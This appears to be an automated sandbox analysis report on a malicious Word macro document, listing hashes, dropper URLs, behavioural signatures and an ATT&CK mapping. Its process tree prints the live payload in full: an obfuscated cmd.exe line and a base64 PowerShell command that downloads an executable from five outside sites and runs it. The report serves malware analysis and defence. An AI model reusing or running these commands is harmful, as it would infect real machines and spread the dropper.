0855da5a6db49a1d2043493d292f3282845b92d4b1d4f6c55eea9026cfcda488

General

Target

0855da5a6db49a1d2043493d292f3282845b92d4b1d4f6c55eea9026cfcda488.doc
Size

87KB
MD5

e416aa320c5070df1128c8d44872aeab
SHA1

b2c6e3255697811c32bc7b461d161b9398e93a8f
SHA256

0855da5a6db49a1d2043493d292f3282845b92d4b1d4f6c55eea9026cfcda488
SHA512

8bd6ad269772e114766398c075312ac931c1fd1386887a1854336858bf0aa10fac3fd499b914e62027fd39fb40a0d8f6bd4f0fc73a1f9060e9fa78d79c269123

Score

10^/10

evasion spyware trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://freshnlaundry.com/MmU

exe.dropper

http://bravewill.org/5VKAhr

exe.dropper

http://ypsifest.com/xbrYo

exe.dropper

http://nazarspot.com.tr/dTofA3

exe.dropper

http://suicidepreventionportagecounty.org/J5

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

CMd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1956	1868	CMd.exe	WINWORD.EXE

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1980 powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1980 powershell.exe
1980 powershell.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1868 WINWORD.EXE
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1868 WINWORD.EXE
1868 WINWORD.EXE
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs

Processes:

CMd.exe

pid process

1956 CMd.exe

description	pid	process
Token: SeDebugPrivilege	1980	powershell.exe

pid	process
1980	powershell.exe
1980	powershell.exe

pid	process
1868	WINWORD.EXE

pid	process
1868	WINWORD.EXE
1868	WINWORD.EXE

pid	process
1956	CMd.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

WINWORD.EXE

description	pid	process	target process
PID 1868 wrote to memory of 1956	1868	WINWORD.EXE	CMd.exe
PID 1868 wrote to memory of 1956	1868	WINWORD.EXE	CMd.exe
PID 1868 wrote to memory of 1956	1868	WINWORD.EXE	CMd.exe

Blacklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
5	1980	powershell.exe
7	1980	powershell.exe
9	1980	powershell.exe
10	1980	powershell.exe
11	1980	powershell.exe
13	1980	powershell.exe
15	1980	powershell.exe

Office loads VBA resources, possible macro or embedded object present

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	powershell.exe

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0855da5a6db49a1d2043493d292f3282845b92d4b1d4f6c55eea9026cfcda488.doc"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1868

C:\Windows\system32\CMd.exe
CMd /v^ ^ /C " Set^ ^ ^I^F^=xo^@^{r^}[{^l^l -^{^ ^JA^B^QAE(^AU^@A^%^A^G4AZ^QB3AC^0Ab@BiAGo^A^ZQBj^A^H^Q^A#A^B^O^A^G^U^A^d^A^A^uAFcAZ^QB^i^AE^M^Ab^AB^x^A^G^UAbg^B0^AD^}A^J^AB^aAEMA^d^@^A^%^ACc^Aa^AB^0A^HQAcAA^6^AC(A^L@^B+AH^#A^Z^Q^Bz^AGg^Abg^B^}^A^G^EA^d^Q^Bu^AGQAc^gB^5^AC^4A^Y@BvAG0A^L@B^'^A^G^0^AVQ^BA^AGgAd^AB^0^AHA^A^Og^AvAC(AY^gBy^AGEAdgB^l^AHc^A^aQB^}^A^G@AL^g^Bv^AH^#^A^Z^@Av^ADUAVg^BL^A^EEAaAB^yAEAAa^AB^0A^HQAcA^A^6^AC(^A^L^@B^5^AHAAc@^B^x^A^G^YA^ZQB^zA^HQAL^gB^jAG(AbQ^Av^AHg^AY^g^B^yAF^k^A^b^@^B^A^AGg^A^d^A^B0^AHAA^O^gAvAC(^Ab^gB[^A^H^o^A^Y^Q^B^y^A^HM^AcABv^AH^Q^A^L^gB^jA^G(AbQAu^A^H^QAc^gAvA^GQ^AV^A^Bv^AGY^AQQ^A^zA^EAAa^A^B^0A^HQAcA^A6AC(^AL@Bz^A^HU^A^a^Q^Bj^AGkA^Z^A^B^l^A^HA^AcgBlAHY^A^ZQB^u^A^HQA^a^Q^Bv^A^G^4^Ac^ABvA^H#AdA^B^[A^GcAZ^Q^Bj^A^G(^AdQ^B^u^AH^QA{QA^u^AG(^Acg^Bn^AC(A^SgA1^ACcA^L^g^BTA^HA^A^b^A^B^x^A^HQ^AK^AAnAEAA^J@^AxA^D}AJAB^+A^EYAVgAg^AD0^A#^A^AnA^DgA^M@^A^,ACc^A^O^@AkAF^UA{gB^xA^D0^AJABlAG4A^d^gA6A^HAA^dQB^i^AG@^A^aQBj^AC}^AJ@^BcACcAK^@A^k^AG^YARg^B^WAC}A^J@AuA^G^U^A^{ABlACc^A^O@^B+^AG(AcgB^lAG^E^AY@Bo^AC^g^A^JA^Br^AE^Y^AWgAg^A^G^k^A^bgAgACQAW^g^BD^AHc^A^KQ^B7AH^Q^Ac^g^B5AH}^AJ^A^BQ^AE(^AU^@^AuAE^QAb@B^3^A^G^4Ab^ABv^AG^E^A^Z^A^BGA^G^kA^b^A^B^l^AC^gAJA^Br^A^E^Y^AWgA^}AC^A^AJA^BV^A^H^oA^a^QA^x^A^D^}^AS^Q^B^uA^H^YAb^@BrAG^UA^LQBJA^HQA^ZQB^9^ACA^AJABVA^HoAa^QA^7A^G^#Ac^gB^l^AGEAa^@^A7^AH0^A^Y@B[^A^H^Q^A^Y^@^Bo^A^H^}A)QB^%^AC^A^A^#^AAg^ACA^A^#^A^AgAC^A^A#^AA^g^ACA^A^#^AA^g^AC^AA^#AA^g^ACA^A^#A^A=&& S^Et ^ j^Z^oY=!IF^:9=^t^!&& se^t ^ ^ ^UJ^b=^!j^Z^o^Y^:%=^9^!& S^E^T X^G^u=^!^U^J^b:)^=^f^!&& Se^T h^1^Q^2=^!X^G^u^:^x^=^p!&& Se^t ^ ^ ^SO^8Q=^!h^1^Q^2^:^#=I^!&& s^e^t ^ ^ ^gS=^!^SO^8Q^:(^=^8^!&& se^t ^p^9r=!^g^S^:^{=^e!&& S^Et ^ ^d^z=^!^p^9r^:^@^=^w^!&& SeT ^ ^K^S0=^!^d^z:^,^=2^!&& S^ET ^ D^x^8k=!^K^S0^:^'^=N^!&& s^E^T xF0=!D^x^8^k^:^[^=h!&&S^E^t ^ fd^b^t=!^x^F^0^:^+^=^m!& s^e^t ^ r^HV^e=^!^f^d^b^t^:^}^=^s^!&c^a^ll %r^HV^e% "
2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:1956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e JABQAE8AUwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABaAEMAdwA9ACcAaAB0AHQAcAA6AC8ALwBmAHIAZQBzAGgAbgBsAGEAdQBuAGQAcgB5AC4AYwBvAG0ALwBNAG0AVQBAAGgAdAB0AHAAOgAvAC8AYgByAGEAdgBlAHcAaQBsAGwALgBvAHIAZwAvADUAVgBLAEEAaAByAEAAaAB0AHQAcAA6AC8ALwB5AHAAcwBpAGYAZQBzAHQALgBjAG8AbQAvAHgAYgByAFkAbwBAAGgAdAB0AHAAOgAvAC8AbgBhAHoAYQByAHMAcABvAHQALgBjAG8AbQAuAHQAcgAvAGQAVABvAGYAQQAzAEAAaAB0AHQAcAA6AC8ALwBzAHUAaQBjAGkAZABlAHAAcgBlAHYAZQBuAHQAaQBvAG4AcABvAHIAdABhAGcAZQBjAG8AdQBuAHQAeQAuAG8AcgBnAC8ASgA1ACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABmAEYAVgAgAD0AIAAnADgAMwA2ACcAOwAkAFUAegBpAD0AJABlAG4AdgA6AHAAdQBiAGwAaQBjACsAJwBcACcAKwAkAGYARgBWACsAJwAuAGUAeABlACcAOwBmAG8AcgBlAGEAYwBoACgAJABrAEYAWgAgAGkAbgAgACQAWgBDAHcAKQB7AHQAcgB5AHsAJABQAE8AUwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABrAEYAWgAsACAAJABVAHoAaQApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABVAHoAaQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAfQB9ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA=
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Modifies system certificate store
PID:1980

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

1

T1130

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1868-0-0x0000000005DB0000-0x0000000005EB0000-memory.dmp

Filesize
1024KB

Download
memory/1868-1-0x0000000005DB0000-0x0000000005EB0000-memory.dmp

Filesize
1024KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads